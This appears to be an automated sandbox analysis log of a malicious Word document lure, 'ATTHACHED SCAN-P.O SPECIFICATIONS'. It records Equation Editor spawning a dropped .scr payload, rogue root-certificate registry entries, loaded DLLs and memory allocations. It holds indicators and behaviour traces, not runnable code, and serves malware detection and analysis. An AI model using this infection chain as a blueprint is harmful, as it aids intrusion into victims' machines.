          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: credssp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK.0.drLNK file: ..\..\..\..\..\Desktop\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: mpoom39002.scr, 00000005.00000002.346550493.0000000002201000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000005.00000002.346411326.0000000000330000.00000004.08000000.00040000.00000000.sdmp
          Source: mpoom[1].scr.2.drStatic PE information: 0x9F140DDE [Tue Jul 28 22:46:54 2054 UTC]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346E33 push esi; ret 2_2_00346E37
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0034683F push esi; ret 2_2_00346843
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346839 push esi; ret 2_2_0034683B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346A24 push ebp; ret 2_2_00346A27
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0034902C push esp; ret 2_2_003491F3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346E2B push esi; ret 2_2_00346E2F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00333E19 push cs; iretd 2_2_00333E1C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346E0C push esi; ret 2_2_00346E27
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346471 push esi; ret 2_2_00346473
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346478 push esi; ret 2_2_0034647B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346A63 push ebp; ret 2_2_00346A67
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346A6B push ebp; ret 2_2_00346A6F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0034445D push ebp; ret 2_2_0034445F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346A40 push ebp; ret 2_2_00346A5F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00349041 push esp; ret 2_2_003491F3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003464B7 push esi; ret 2_2_003464BB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003464BF push esi; ret 2_2_003464C3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003464AA push esi; ret 2_2_003464B3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00348895 push ebp; ret 2_2_00348897
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346882 push esi; ret 2_2_00346883
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0034888D push ebp; ret 2_2_0034888F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00346888 push esi; ret 2_2_0034688B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003490D4 push esp; ret 2_2_003491F3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003462D6 push ebx; ret 2_2_003462D7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003462DE push ebx; ret 2_2_003462DF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003462CE push ebx; ret 2_2_003462CF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0033A32E push eax; retn 0033h2_2_0033A349
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00344D10 push esp; ret 2_2_00345057
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00338F59 push eax; retf 2_2_00338F61
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00348FB1 push esp; ret 2_2_003491F3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003301F4 push eax; retf 2_2_003301F5
          Source: mpoom[1].scr.2.drStatic PE information: section name: .text entropy: 7.638064581182766
          Source: mpoom39002.scr.2.drStatic PE information: section name: .text entropy: 7.638064581182766

          Persistence and Installation Behavior

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\mpoom39002.scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\mpoom39002.scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scrJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 1E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 2200000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\mpoom39002.scrMemory allocated: 440000 memory reserve | memory write watchJump to behavior
